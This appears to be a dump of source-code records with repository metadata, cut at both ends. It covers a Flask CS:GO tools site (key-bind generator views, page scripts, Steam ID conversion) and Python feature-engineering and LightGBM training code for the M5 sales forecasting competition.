}, 25);\n },\n \n hide: function(el, time){\n el.addClass('is-hidden');\n setTimeout(function(){\n el.hide();\n }, time);\n },\n \n animate: function(){},\n};\n\nvar views = {};\n\nviews.header = { \n cacheDom: function(){\n this.el = $('.js-header');\n this.btnResetAll = this.el.find('.js-btn-resetAll');\n },\n};\n\nviews.genContainer = {\n cacheDom: function(){\n this.el = $('.js-genContainer');\n this.btnKpGen = this.el.find('.js-btn-kpGen');\n this.btnSkGen = this.el.find('.js-btn-skGen');\n this.kpGen = this.el.find('.js-kpGen');\n this.skGen = this.el.find('.js-skGen');\n this.label = this.el.find('.js-genLabel');\n },\n\n updateLabel: function(text){\n this.label.html(text);\n },\n\n showKpGen: function(){\n this.hideSkGen();\n this.updateLabel('Key Pad'); \n \n setTimeout(function(){\n views.genContainer.kpGen.fadeIn(250);\n }, 250);\n },\n\n hideKpGen: function(){\n this.kpGen.fadeOut(200);\n },\n\n showSkGen: function(){\n this.hideKpGen();\n this.updateLabel('选择模式');\n\n setTimeout(function(){\n views.genContainer.skGen.fadeIn(200);\n }, 202);\n },\n\n hideSkGen: function(){\n this.skGen.fadeOut(250);\n },\n};\n\nviews.kpGen = { \n cacheDom: function(){\n this.el = $('.js-kpGen');\n this.btnKpClear = this.el.find('.js-btn-kpClear');\n this.keyPad = this.el.find('.js-keyPad');\n this.kpKeys = this.keyPad.find('.js-kpKey');\n },\n \n appendKeys: function(keysObj){\n var thisKey, div;\n \n for (var key in keysObj){\n if (keysObj[key].type === 'kp'){\n thisKey = keysObj[key];\n div = '<div class=\"key js-kpKey\" bind=\"'+thisKey.bind+'\"><span>'+thisKey.displayName+'</span></div>';\n \n this.keyPad.append(div);\n };\n };\n \n this.cacheDom();\n },\n \n markBoundKeys: function(keysArr){\n var domKey;\n this.kpKeys.removeClass('has-binds');\n \n for 
(var i=0; i<keysArr.length; i++){\n domKey = this.keyPad.find('.js-kpKey[bind=\"'+keysArr[i].bind+'\"]');\n domKey.addClass('has-binds');\n };\n },\n};\n\nviews.skGen = {\n cacheDom: function(){\n this.el = $('.js-skGen');\n this.btnSkClear = this.el.find('.js-btn-skClear');\n this.keySelector = this.el.find('.js-keySelector');\n this.selectedKeys = this.el.find('.js-selectedKeys');\n this.skKeys = this.el.find('.js-skKey');\n this.bindsBoxes = this.el.find('.js-bindsBox');\n this.btnAddBinds = this.el.find('.js-btn-addBinds');\n },\n\n appendKeySelector: function(keysObj){\n var option, thisKey;\n\n for (var key in keysObj){\n if (keysObj[key].type === 'sk'){\n thisKey = keysObj[key];\n option = '<option bind=\"'+thisKey.bind+'\">'+thisKey.displayName+'</option>';\n\n this.keySelector.append(option);\n };\n };\n\n this.cacheDom();\n },\n\n addBindsBox: function(key){\n var box = '<div class=\"bindsBox js-bindsBox\" bind=\"'+key.bind+'\"><div class=\"key js-skKey\" title=\"remove key\"><span>'+key.displayName+'</span></div><button class=\"js-btn-addBinds\">编辑按键</button></div>'; \n this.selectedKeys.append(box);\n var thisBox = $('.js-bindsBox[bind=\"'+key.bind+'\"]');\n thisBox.fadeIn(250).css('display', 'inline-block');\n this.keySelector.val(\"Add Key\");\n\n this.cacheDom();\n },\n\n removeBindsBox: function(box){\n this.keySelector.val(\"Add Key\");\n box.fadeOut(250);\n setTimeout(function(){box.remove()}, 255);\n },\n\n removeAllBindsBoxes: function(){\n this.keySelector.val(\"Add Key\");\n this.bindsBoxes.fadeOut(250);\n setTimeout(function(){views.skGen.bindsBoxes.remove()}, 255);\n },\n\n addBinds: function(binds, key){\n var box = this.el.find('.js-bindsBox[bind=\"'+key+'\"]');\n var item;\n box.find('.js-item').remove();\n\n for (var i = 0; i < binds.length; i++){\n item = '<div class=\"item js-item\" bind=\"'+binds[i].bind+'\" title=\"remove item\">'+binds[i].displayNameShort+'</div>';\n box.append(item);\n };\n },\n\n removeBind: function(){},\n};\n\nviews.overlay = {\n cacheDom: function(){\n this.el = $('.js-overlay');\n this.dark = $('.js-dark');\n this.keyDisplay = this.el.find('.js-keyDisplay span');\n this.btnOlAccept = this.el.find('.js-btn-olAccept');\n this.btnOlCancel = this.el.find('.js-btn-olCancel');\n this.btnOlClear = this.el.find('.js-btn-olClear');\n this.dropSelectors = this.el.find('.js-dropSelector');\n this.dropMenus = this.el.find('.js-dropMenu');\n this.menuItems = this.dropMenus.find('.js-menuItem');\n this.loadOut = this.el.find('.js-loadOut');\n this.loItems = this.loadOut.find('.js-items img');\n },\n\n appendDropMenus: function(itemsObj){\n var thisItem, menu, image, name;\n \n for (var item in itemsObj){\n thisItem = itemsObj[item];\n menu = this.el.find('.js-dropMenu[bind=\"'+thisItem.category+'\"]');\n image = '<div class=\"row\"><img src=\"/static/images/keybind/'+thisItem.bind+'.png\"></div>';\n name = '<div class=\"row js-menuItem\" bind=\"'+thisItem.bind+'\"><p>'+thisItem.displayName+'</p></div>';\n \n menu.find('.js-itemPhotos').append(image);\n menu.find('.js-itemNames').append(name); \n };\n \n this.cacheDom();\n },\n\n show: function(keyName){\n this.keyDisplay.html(keyName);\n this.dark.fadeIn(250);\n transitions.show(this.el);\n },\n \n hide: function(){\n this.dark.fadeOut(250);\n transitions.hide(this.el, 250);\n this.hideDropMenus();\n },\n \n toggleDropMenu: function(menu){\n var thisMenu = this.el.find('.js-dropMenu[bind=\"'+menu+'\"]');\n\n this.hideDropMenus();\n\n if (!thisMenu.is(':visible')){\n transitions.show(thisMenu);\n 
};\n },\n \n hideDropMenus: function(){\n this.dropMenus.each(function(){\n if ($(this).is(':visible')){\n transitions.hide($(this), 250);\n };\n });\n },\n \n renderItems: function(boundItems){\n var thisItem, image;\n this.loItems.remove();\n \n for (var i=0; i<boundItems.length; i++){\n thisItem = boundItems[i];\n image = '<img src=\"/static/images/keybind/'+thisItem.bind+'.png\" bind=\"'+thisItem.bind+'\" title=\"'+thisItem.displayName+'\">'\n this.loadOut.find('.js-items[bind=\"'+thisItem.category+'\"]').append(image);\n };\n this.cacheDom();\n },\n};\n\nviews.bindsOutput = {\n cacheDom: function(){\n this.el = $('.js-bindsOutput');\n this.output = this.el.find('p');\n },\n \n renderBinds: function(keyBindsObj){\n this.output.html('');\n var html = this.output.html();\n \n for (var key in keyBindsObj){\n var thisKey = keyBindsObj[key];\n this.output.html(html + ' bind ' + thisKey.name);\n html = this.output.html();\n \n for (var i=0; i<thisKey.items.length; i++){\n this.output.html(html + ' ' + '\"buy '+thisKey.items[i]+'\"');\n html = this.output.html();\n };\n };\n },\n};" }, { "alpha_fraction": 0.4298013150691986, "alphanum_fraction": 0.43841060996055603, "avg_line_length": 22.24615478515625, "blob_id": "cf8c1865965698e1df3f76f98bdd098efe7b021c", "content_id": "7956020ab75d437e0ca40c9688187b6e0016d1ea", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1622, "license_type": "permissive", "max_line_length": 61, "num_lines": 65, "path": "/app/static/js/common.js", "repo_name": "MyFaith/flask-csgo-tools", "src_encoding": "UTF-8", "text": "/**\n * Created by Faith on 16/7/6.\n */\n\n$(function () {\n // PJAX\n $(document).pjax(\"#navbar a[href!='/logout']\", \"#main\", {\n fragment: \"#main\",\n timeout: 10000,\n maxCacheLength: 0\n });\n // 设置动态active\n $(\"#navbar a\").click(function (e) {\n $(\"#navbar a\").removeClass(\"active\");\n $(this).addClass(\"active\");\n });\n // 设置加载动画\n $(document).on(\"pjax:start\", function () {\n $(\"#loader\").addClass(\"active\");\n });\n $(document).on(\"pjax:end\", function () {\n $(\"#loader\").removeClass(\"active\");\n });\n // 初始化下拉菜单\n $('select.dropdown').dropdown();\n // 初始化富文本编辑器\n var editor = new Simditor({\n textarea: $('#editor'),\n toolbar: [\n 'title',\n 'bold',\n 'italic',\n 'underline',\n 'strikethrough',\n 'fontScale',\n 'color',\n 'ol',\n 'ul',\n 'blockquote',\n 'code',\n 'table',\n 'link',\n 'image',\n 'hr',\n 'indent',\n 'outdent',\n 'alignment'\n ]\n });\n});\n\nfunction confirm_delete(url) {\n swal({\n title: \"你确定吗?\",\n text: \"你将不会恢复此过程!\",\n type: \"warning\",\n showCancelButton: true,\n confirmButtonColor: \"#DD6B55\",\n confirmButtonText: \"是的,删除它!\",\n closeOnConfirm: false\n }, function () {\n swal(\"已删除!\", \"你的删除请求已成功.\", \"success\");\n window.location.href = url;\n });\n}" }, { "alpha_fraction": 0.6400445699691772, "alphanum_fraction": 0.6530460715293884, "avg_line_length": 39.80303192138672, "blob_id": "f4a91e0d858763e36400803f0c25ef26b9053605", "content_id": "0a5a33d4677708b2df42f11d6152937c289bef38", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2692, "license_type": "permissive", "max_line_length": 99, "num_lines": 66, "path": "/app/utils.py", "repo_name": "MyFaith/flask-csgo-tools", "src_encoding": "UTF-8", "text": "import urllib.request, re\nfrom xml.dom import minidom\n\nclass steam_convert():\n def __init__(self, userid):\n self.userURL = 
\"http://steamcommunity.com/id/{USER}/?xml=1\"\n self.idURL = \"http://steamcommunity.com/profiles/{ID}/?xml=1\"\n self.steamIDBase = 76561197960265728\n self.userid = userid\n\n def convertCommunityIDToCustomURL(self, communityID):\n dom = minidom.parse(urllib.request.urlopen(re.sub(\"\\{ID\\}\", str(communityID), self.idURL)))\n customURL = dom.getElementsByTagName(\"customURL\")[0].firstChild.data\n return customURL\n\n def convertCommunityIDToSteamID(self, communityID):\n steamID = []\n steamID.append(\"STEAM_0:\")\n steamIDLastPart = communityID - self.steamIDBase\n if steamIDLastPart % 2 == 0:\n steamID.append(\"0:\")\n else:\n steamID.append(\"1:\")\n steamID.append(str(steamIDLastPart // 2))\n return \"\".join(steamID)\n\n def convertCustomURLToCommunityID(self, customURL):\n dom = minidom.parse(urllib.request.urlopen(re.sub(\"\\{USER\\}\", customURL, self.userURL)))\n communityID = dom.getElementsByTagName(\"steamID64\")[0].firstChild.data\n return int(communityID)\n\n def convertCustomURLToSteamID(self, customURL):\n communityID = self.convertCustomURLToCommunityID(customURL)\n return self.convertCommunityIDToSteamID(communityID)\n\n def convertSteamIDToCommunityID(self, steamID):\n steamIDParts = re.split(\":\", steamID)\n communityID = int(steamIDParts[2]) * 2\n if steamIDParts[1] == \"1\":\n communityID += 1\n communityID += self.steamIDBase\n return communityID\n\n def convertSteamIDToCustomURL(self, steamID):\n communityID = self.convertSteamIDToCommunityID(steamID)\n return self.convertCommunityIDToCustomURL(communityID)\n\n def getResult(self):\n if self.userid.startswith(\"STEAM_0:\"):\n steamID = self.userid\n communityID = self.convertSteamIDToCommunityID(steamID)\n customURL = self.convertCommunityIDToCustomURL(communityID)\n elif re.match(\"^\\d*$\", self.userid):\n communityID = int(self.userid)\n steamID = self.convertCommunityIDToSteamID(communityID)\n customURL = self.convertCommunityIDToCustomURL(communityID)\n else:\n # assuming valid custom url\n customURL = self.userid\n communityID = self.convertCustomURLToCommunityID(customURL)\n steamID = self.convertCommunityIDToSteamID(communityID)\n return {\n 'customURL': customURL,\n 'communityID': communityID,\n 'steamID': steamID\n }" } ]
14
poanse/m5-forecasting-accuracy
https://github.com/poanse/m5-forecasting-accuracy
199b5de9f165eaaa947f576e8dd7149c0d956cce
ab649ae15c4a7f1ad7e39bd193f6997c2f236b24
f31a57dcf9d415acaf38e9ffb59d6b27d11889bf
refs/heads/main
2023-01-04T07:45:05.577388
2020-10-20T10:53:17
2020-10-20T10:53:17
305,494,415
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6059123277664185, "alphanum_fraction": 0.6366972327232361, "avg_line_length": 27.6900577545166, "blob_id": "be18bbe6bd3452bcd90953dbd22c0519c5c900b8", "content_id": "33a85ed88c9f4e4ea6b68ebbf0cdbd861a64c92a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4905, "license_type": "no_license", "max_line_length": 94, "num_lines": 171, "path": "/step.py", "repo_name": "poanse/m5-forecasting-accuracy", "src_encoding": "UTF-8", "text": "from utils import *\nfrom datetime import datetime\n\ndef step(parameters):\n add_model(parameters)\n model_id = get_model_id(parameters)\n evaluate_model(model_id)\n pass\n\nparameters = {\n 'fcst_horizon' : 4,\n 'history_length' : 730,\n 'lgbm_params':{\n \"objective\" : \"poisson\",\n \"metric\" :\"rmse\",\n \"force_row_wise\" : True,\n \"learning_rate\" : 0.075,\n # \"sub_feature\" : 0.8,\n \"sub_row\" : 0.75,\n \"bagging_freq\" : 1,\n \"lambda_l2\" : 0.1,\n \"metric\": [\"rmse\"],\n 'verbosity': 1,\n 'num_iterations' : 300,\n 'num_leaves': 64,\n \"min_data_in_leaf\": 100,\n 'seed': 0,\n 'n_jobs': -1\n }\n}\n\n# print(f\"Started at {datetime.now()}\")\n\n# parameters['lgbm_params']['num_iterations'] = 300\n# step(parameters)\n\n# print(f\"Finished model 1 at {datetime.now()}\")\n\n# parameters['lgbm_params']['num_iterations'] = 500\n# step(parameters)\n\n# print(f\"Finished model 2 at {datetime.now()}\")\n\n# parameters['lgbm_params']['num_iterations'] = 800\n# step(parameters)\n\n# print(f\"Finished model 3 at {datetime.now()}\")\n\n# parameters['lgbm_params']['num_iterations'] = 300\n# parameters['lgbm_params']['sub_feature'] = 0.7\n# step(parameters)\n\n# print(f\"Finished model 4 at {datetime.now()}\")\n\n# parameters['lgbm_params']['num_iterations'] = 300\n# parameters['lgbm_params']['sub_feature'] = 0.3\n# step(parameters)\n\n# print(f\"Finished model 5 at {datetime.now()}\")\n\n# parameters['lgbm_params']['num_iterations'] = 300\n# parameters['lgbm_params']['sub_feature'] = 1.0\n# parameters['lgbm_params']['num_leaves'] = 16\n# step(parameters)\n\n# print(f\"Finished model 6 at {datetime.now()}\")\n\n# parameters['lgbm_params']['num_iterations'] = 300\n# parameters['lgbm_params']['sub_feature'] = 1.0\n# parameters['lgbm_params']['num_leaves'] = 256\n# step(parameters)\n\n# print(f\"Finished all 7 models at {datetime.now()}\")\n\n\n\n# store_ids = ['CA_1', 'CA_2', 'CA_3', 'CA_4', 'TX_1', 'TX_2', 'TX_3', 'WI_1', 'WI_2', 'WI_3']\n# i = 1\n# for store_id in store_ids:\n# print (f'Step {i} out of {len(store_ids)} started at {datetime.now()}')\n# # value_filter = {'state_id' : [state_id], 'cat_id' : [cat_id]}\n# value_filter = {'store_id' : [store_id]}\n# abt = create_abt(value_filter=value_filter)\n# abt.to_pickle(f'./work/abt_{store_id}.pkl')\n# # abt.to_csv(f'./work/baseline_abt_{store_id}.csv')\n# abt = None\n# i += 1\n# print (f'Finished creating abt at {datetime.now()}')\n\n\nparameters = {\n 'fcst_horizon' : 4,\n 'history_length' : 730,\n 'history_start' : 35,\n 'lgbm_params':{\n \"objective\" : \"poisson\",\n \"metric\" :\"rmse\",\n \"force_row_wise\" : True,\n \"learning_rate\" : 0.075,\n # \"sub_feature\" : 0.8,\n \"sub_row\" : 0.75,\n \"bagging_freq\" : 1,\n \"lambda_l2\" : 0.1,\n \"metric\": [\"rmse\"],\n 'verbosity': 1,\n 'num_iterations' : 300,\n 'num_leaves': 16,\n \"min_data_in_leaf\": 100,\n 'seed': 0,\n 'n_jobs': -1\n }\n}\nadd_model(parameters)\nmodel_id = 
get_model_id(parameters)\nevaluate_model(model_id)\nget_val_fcst(model_id)\nprepare_val_submission(model_id)\n\nprint (f'Finished creating creating forecast for model {model_id} at {datetime.now()}')\n\nparameters['history_length'] = 1100\nadd_model(parameters)\nmodel_id = get_model_id(parameters)\nevaluate_model(model_id)\n# prepare_val_submission(model_id)\n\nprint (f'Finished creating creating forecast for model {model_id} at {datetime.now()}')\n\nparameters['history_length'] = 730\nparameters['lgbm_params']['num_iterations'] = 500\nadd_model(parameters)\nmodel_id = get_model_id(parameters)\nevaluate_model(model_id)\nget_val_fcst(model_id)\nprepare_val_submission(model_id)\n\nprint (f'Finished creating creating forecast for model {model_id} at {datetime.now()}')\n\nparameters['history_length'] = 730\nparameters['lgbm_params']['num_iterations'] = 300\nparameters['lgbm_params']['num_leaves'] = 64\nadd_model(parameters)\nmodel_id = get_model_id(parameters)\nevaluate_model(model_id)\nget_val_fcst(model_id)\nprepare_val_submission(model_id)\n\nprint (f'Finished creating creating forecast for model {model_id} at {datetime.now()}')\n\nparameters['history_length'] = 1100\nparameters['lgbm_params']['num_iterations'] = 500\nparameters['lgbm_params']['num_leaves'] = 16\nadd_model(parameters)\nmodel_id = get_model_id(parameters)\nevaluate_model(model_id)\n# prepare_val_submission(model_id)\n\n\nprint (f'Finished creating creating forecast for model {model_id} at {datetime.now()}')\n\nparameters['history_length'] = 730\nparameters['lgbm_params']['num_iterations'] = 300\nparameters['lgbm_params']['num_leaves'] = 16\nparameters['lgbm_params']['min_data_in_leaf'] = 10000\nadd_model(parameters)\nmodel_id = get_model_id(parameters)\nevaluate_model(model_id)\nget_val_fcst(model_id)\nprepare_val_submission(model_id)\n\nprint (f'Finished creating creating forecast for model {model_id} at {datetime.now()}')" }, { "alpha_fraction": 0.5637272596359253, "alphanum_fraction": 0.5745624303817749, "avg_line_length": 42.408103942871094, "blob_id": "ab20ab125a19544949ea0776f64bb82393c1fa95", "content_id": "bc2bd1de38895ab8dd685099e7d8a8d259ed4530", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30193, "license_type": "no_license", "max_line_length": 172, "num_lines": 691, "path": "/utils.py", "repo_name": "poanse/m5-forecasting-accuracy", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\nimport pickle\nimport os\nimport lightgbm as lgb\nimport gc\n\ndef read_train(filename = './data/sales_train_evaluation.csv'):\n # num_columns = ['d_{}'.format(i) for i in range(1,1914)]\n if 'sales.pkl' not in os.listdir('./data'):\n columns = pd.read_csv(filename, header=0, nrows=0).columns\n num_columns = [col for col in columns if col.startswith('d_')]\n dtypes = ['uint16'] * len(num_columns)\n dtypes = dict(zip(num_columns, dtypes))\n df = pd.read_csv(filename, dtype=dtypes)\n df['id'] = df['id'].str[:-len(\"evaluation\")] + \"validation\"\n df.to_pickle('./data/sales.pkl')\n else:\n df = pd.read_pickle('./data/sales.pkl')\n return df\n\ndef read_calendar(filename = './data/calendar.csv'):\n if 'calendar.pkl' not in os.listdir('./data'):\n df = pd.read_csv(filename, parse_dates=['date'])\n df.to_pickle('./data/calendar.pkl')\n else:\n df = pd.read_pickle('./data/calendar.pkl')\n return df\n\ndef read_prices(filename = './data/sell_prices.csv'):\n if 'sell_prices.pkl' not in os.listdir('./data'):\n df = pd.read_csv(filename)\n df['wm_yr_wk'] = 
df['wm_yr_wk'].astype('uint16')\n df['sell_price'] = (100 * df['sell_price']).astype('uint16')\n df.sort_values(['store_id', 'item_id', 'wm_yr_wk'], inplace=True)\n df.to_pickle('./data/sell_prices.pkl')\n else:\n df = pd.read_pickle('./data/sell_prices.pkl')\n return df\n\n# columns = ['id', 'item_id', 'dept_id', 'cat_id', 'store_id', 'state_id']\nclass cat_encoder():\n def __init__(self):\n self.mapping = {}\n\n def encode(self, df, column):\n if column not in self.mapping:\n self.mapping[column] = {}\n for i, value in enumerate(sorted(list(set(df[column])))):\n self.mapping[column][value] = i\n else:\n # find values in df[column] that are not in mapping\n new_values = []\n for value in list(set(df[column])):\n if value not in self.mapping[column]:\n new_values.append(value)\n # add mapping for them\n if new_values != []:\n # find largest used number\n max_number = max(list(self.mapping[column].values()))\n # add mapping for new values\n for i, new_value in enumerate(sorted(new_values)):\n self.mapping[column][new_value] = max_number + i + 1\n\n new_column = df[column].map(self.mapping[column]).astype('uint16')\n return new_column\n\n def decode(self, df, column):\n tmp_mapping = {}\n for key, value in self.mapping[column].items():\n tmp_mapping[value] = key\n new_column = df[column].map(tmp_mapping)\n return new_column\n\ndef load_encoder():\n with open('encoder.pickle', 'rb') as handle:\n encoder = pickle.load(handle)\n return encoder\n\ndef save_encoder(encoder):\n with open('encoder.pickle', 'wb') as filename:\n pickle.dump(encoder, filename, protocol=pickle.HIGHEST_PROTOCOL)\n pass\n\ndef prepare_data(value_filter={}, mode='validation'):\n # read and filter train data\n sales = read_train()\n print(f'Rows before filter: {len(sales)}')\n if value_filter: # if dictionary is not empty\n for column, values in value_filter.items():\n if type(values) != list:\n values = [values]\n mask = sales[column].isin(values)\n sales = sales[mask]\n print(f'Rows after filter: {len(sales)}')\n\n # read and filter prices\n prices = read_prices()\n if value_filter: # if dictionary is not empty\n if 'store_id' in value_filter:\n column = 'store_id'\n values = value_filter[column]\n if type(values) != list:\n values = [values]\n mask = prices[column].isin(values)\n prices = prices[mask]\n\n calendar = read_calendar()\n\n # encode categorical feature to store less space\n\n encoder = load_encoder()\n # encoder = cat_encoder()\n for column in ['id', 'item_id', 'dept_id', 'cat_id', 'store_id', 'state_id']:\n sales[column] = encoder.encode(sales, column=column)\n for column in ['store_id', 'item_id']:\n prices[column] = encoder.encode(prices, column=column)\n\n # add forecast dates\n if mode == 'validation':\n fcst_date = 1914\n elif mode == 'evaluation':\n fcst_date = 1914 + 28\n for i in range(fcst_date, fcst_date + 28):\n sales[f'd_{i}'] = 0\n\n ### transform into time series data\n # save information about categorical variables into separate table\n summary = sales[['id', 'item_id', 'dept_id','cat_id','store_id','state_id']]\n # remove from the original table\n sales.drop(['item_id', 'dept_id','cat_id','store_id','state_id'],axis=1,inplace=True)\n # transform wide to long\n sales = sales.melt(id_vars='id', value_vars=sales.columns[1:], var_name='d', value_name='qty')\n sales['qty'] = sales['qty'].astype('uint16')\n # map days to dates\n d_to_date = dict(calendar[['date','d']].set_index('d')['date'])\n sales['d'] = sales['d'].map(d_to_date)\n # rename mapped column\n sales.rename(columns={'d':'date'}, 
inplace=True)\n # return categorial features\n sales = sales.join(summary.set_index('id'), on='id')\n\n return sales, prices, calendar, encoder\n\ndef day_to_week(day):\n return (day + 4) // 7\n\ndef create_abt(value_filter={}):\n sales, prices, calendar, encoder = prepare_data(value_filter)\n print('Data successfully prepared')\n\n # calculated date of the first sale and add it to summary and sales\n def add_feature_first_sale_date(df):\n firstbuy = df[df['qty']!=0].groupby('id')[['date']].min()\n firstbuy.rename(columns={'date':'firstbuy_date'}, inplace=True)\n dtmp = df[['id']].join(firstbuy, on='id', how='left')\n df['firstbuy_date'] = dtmp['firstbuy_date'].values\n pass\n\n add_feature_first_sale_date(sales)\n\n # remove starting zeroes for every TS\n sales = sales[sales['date'] >= sales['firstbuy_date']]\n\n # sort values by id and date to add lags\n sales.sort_values(['id', 'date'], inplace=True)\n\n # add day and week (number) features\n def add_features_day_week_num(sales, calendar):\n calendar['day'] = calendar['d'].apply(lambda x: int(x[2:])).astype('uint16')\n calendar['week'] = day_to_week(calendar['day']).astype('uint16')\n dtmp = sales[['date']].join(calendar[['date', 'day', 'week']].set_index('date'), on='date', how='left')\n sales['day'] = dtmp['day'].values\n sales['week'] = dtmp['week'].values\n pass\n \n add_features_day_week_num(sales, calendar)\n\n # add lag features\n def add_features_lags(sales):\n temp = sales[['id', 'day', 'qty']]\n temp.set_index(['id', 'day'], inplace=True)\n # сначала расчет фичей, потом джоины с шифтами\n sales_sum = pd.DataFrame({})\n # суммарные продажи за период (целые числа, можно хранить в uint16)\n for window in [7, 28, 91, 364]:\n temp2 = temp.groupby('id').apply(lambda x: x.rolling(window, min_periods=1).sum()).reset_index()\n temp2.rename(columns={'qty' : f'qty_sum_{window}'}, inplace=True)\n # reduce memory usage\n for column in temp2:\n temp2[column] = temp2[column].astype('uint16')\n # combine\n temp2.set_index(['id', 'day'], inplace=True)\n if sales_sum.empty:\n sales_sum = temp2\n else:\n sales_sum = sales_sum.join(temp2, on=['id', 'day'])\n\n # std\n for window in [28, 364]:\n temp2 = temp.groupby('id').apply(lambda x: x.rolling(window, min_periods=1).std()).reset_index()\n temp2.rename(columns={'qty' : f'qty_std_{window}'}, inplace=True)\n # reduce memory usage\n for column in temp2:\n temp2[column] = temp2[column].astype('float32')\n # combine\n temp2.set_index(['id', 'day'], inplace=True)\n sales_sum = sales_sum.join(temp2, on=['id', 'day'])\n\n # медианные продажи\n for window in [28, 364]:\n temp2 = temp.groupby('id').apply(lambda x: x.rolling(window, min_periods=1).median()).reset_index()\n temp2.loc[:, 'qty'] = temp2['qty'] * 2 # double to keep as int\n temp2.rename(columns={'qty' : f'qty_median_{window}'}, inplace=True)\n # reduce memory usage\n for column in temp2:\n temp2[column] = temp2[column].astype('uint16')\n # combine\n temp2.set_index(['id', 'day'], inplace=True)\n sales_sum = sales_sum.join(temp2, on=['id', 'day'])\n\n # отношения продаж за разные периоды\n for period in [28, 91, 364]:\n sales_sum[f'qty_sum_ratio_7_{period}'] = (sales_sum['qty_sum_7'] / sales_sum[f'qty_sum_{period}']).astype('float32')\n if period != 28:\n sales_sum[f'qty_sum_ratio_28_{period}'] = (sales_sum['qty_sum_28'] / sales_sum[f'qty_sum_{period}']).astype('float32')\n\n # джоин полученных фичей с различными шифтами (7, 14, 21, 28)\n periods = 0\n columns = [x for x in sales_sum.columns if x not in ['id', 'day']]\n for i in range(4):\n 
sales_sum.reset_index(inplace=True)\n sales_sum.loc[:, 'day'] = sales_sum['day'] + 7\n periods += 7\n sales_sum.set_index(['id', 'day'], inplace=True)\n sales_sum.columns = [x + f\"_{periods}\" for x in columns]\n sales_sum = sales[['id', 'day']].join(sales_sum, on=['id', 'day'])\n if 'id' in sales_sum.columns and 'day' in sales_sum.columns:\n sales_sum.set_index(['id', 'day'], inplace=True)\n # sales.set_index(['id', 'day'], inplace=True)\n for column in sales_sum.columns:\n sales[column] = sales_sum[column].fillna(0).values\n # sales.reset_index(inplace=True)\n\n for column in sales.columns:\n if 'sum' in column or 'median' in column:\n sales[column] = sales[column].astype('uint16')\n\n # лаги\n temp.reset_index(inplace=True)\n for lag in [7, 14, 21, 28, 35, 42, 49, 56, 364]:\n temp3 = temp.copy()\n temp3['day'] = temp3['day'] + lag\n column = f'lag_{lag}'\n temp3.rename(columns={'qty' : column}, inplace=True)\n temp3.set_index(['id', 'day'], inplace=True)\n temp3 = sales[['id', 'day']].join(temp3, on=['id', 'day'])\n sales[column] = temp3[column].fillna(0).astype('uint16')\n pass\n \n add_features_lags(sales)\n print('Lags successfully added')\n\n # events\n def add_features_events(sales, calendar):\n # divide events into separate columns by type\n for event_type in calendar['event_type_1'].dropna().unique():\n event_name_bytype = []\n for index, row in calendar.iterrows():\n if row['event_type_1'] == event_type:\n event_name_bytype.append(row['event_name_1'])\n elif row['event_type_2'] == event_type:\n event_name_bytype.append(row['event_name_2'])\n else:\n event_name_bytype.append(np.nan)\n event_type = event_type.lower()\n calendar[f'event_name_{event_type}'] = event_name_bytype\n \n calendar.drop(['event_name_1', 'event_name_2', 'event_type_1', 'event_type_2'], axis=1, inplace=True)\n calendar.fillna(method='backfill', inplace=True)\n\n for column in ['event_name_cultural', 'event_name_sporting', 'event_name_national', 'event_name_religious']:\n tmp = calendar[['year', column, 'day']].groupby(['year', column]).max().rename(columns={'day':'maxday'})\n dtmp = calendar[['year', column]].join(tmp, on=['year', column])\n calendar['maxday'] = dtmp['maxday'].values\n calendar[\"days_till_next_{}\".format(column.split('_')[2])] = calendar['maxday'] - calendar['day']\n calendar.drop('maxday', axis=1, inplace=True)\n\n dtmp = sales[['day']].join(calendar[['day','wday', 'month', 'year', 'wm_yr_wk',\n 'event_name_cultural', 'event_name_sporting', \n 'event_name_national', 'event_name_religious',\n 'days_till_next_cultural', 'days_till_next_sporting',\n 'days_till_next_national', 'days_till_next_religious']].set_index('day'), on='day')\n for column in dtmp.columns:\n if column not in ['day']:\n sales[column] = dtmp[column].values\n for column in ['event_name_cultural', 'event_name_sporting', 'event_name_national', 'event_name_religious']:\n sales[column] = encoder.encode(sales, column)\n for column in ['days_till_next_cultural', 'days_till_next_sporting', 'days_till_next_national', 'days_till_next_religious']:\n sales[column] = sales[column].astype('uint16')\n for column in ['wday', 'month']:\n sales[column] = sales[column].astype('uint8')\n for column in ['wm_yr_wk', 'year']:\n sales[column] = sales[column].astype('uint16')\n pass\n \n add_features_events(sales, calendar)\n print('Events successfully added')\n\n # add length of history\n sales['history_length'] = ((sales['date'] - sales['firstbuy_date']).dt.days).astype('int16')\n \n sales.drop('firstbuy_date', axis=1, inplace=True)\n\n # add 
day number in year\n sales['dayofyear'] = (sales['date'].dt.dayofyear).astype('uint16')\n\n # combine 3 snap columns into 1\n def add_feature_snap(sales, calendar):\n snap_columns = [x for x in calendar.columns if x.startswith('snap_')]\n temp = calendar[['day'] + snap_columns]\n state_ids = list(encoder.mapping['state_id'].keys())\n dtmps = pd.DataFrame({})\n for state_id in state_ids:\n snap_current = [x for x in snap_columns if x.endswith(state_id)][0]\n dtmp = temp[['day', snap_current]]\n dtmp.loc[:, 'state_id'] = encoder.mapping['state_id'][state_id]\n dtmp['snap'] = dtmp[snap_current].values\n dtmp.drop(snap_current, axis=1, inplace=True)\n dtmps = pd.concat([dtmps, dtmp])\n \n columns = ['day', 'state_id']\n dtmps.set_index(columns, inplace=True)\n dtmp = sales[columns].join(dtmps, on=columns)\n sales['snap'] = dtmp['snap'].values\n sales['snap'] = sales['snap'].astype('uint8')\n pass\n\n add_feature_snap(sales, calendar)\n print('Snaps successfully added')\n\n def add_features_price(sales, prices):\n # group by store, item\n temp = prices.copy()\n temp.loc[:, 'wm_yr_wk'] = temp.loc[:, 'wm_yr_wk'] + 1\n temp.set_index(['store_id', 'item_id', 'wm_yr_wk'], inplace=True)\n # calculate monthly mean\n temp = temp.groupby(['store_id', 'item_id']).apply(lambda x: x.rolling(4, min_periods=1).mean())\n temp.rename(columns={'sell_price':'price_mean_month'}, inplace=True)\n temp['price_mean_month'] = temp['price_mean_month'].astype(int)\n\n columns = ['store_id', 'item_id', 'wm_yr_wk']\n temp = temp.join(prices.set_index(columns), on=columns, how='left')\n # 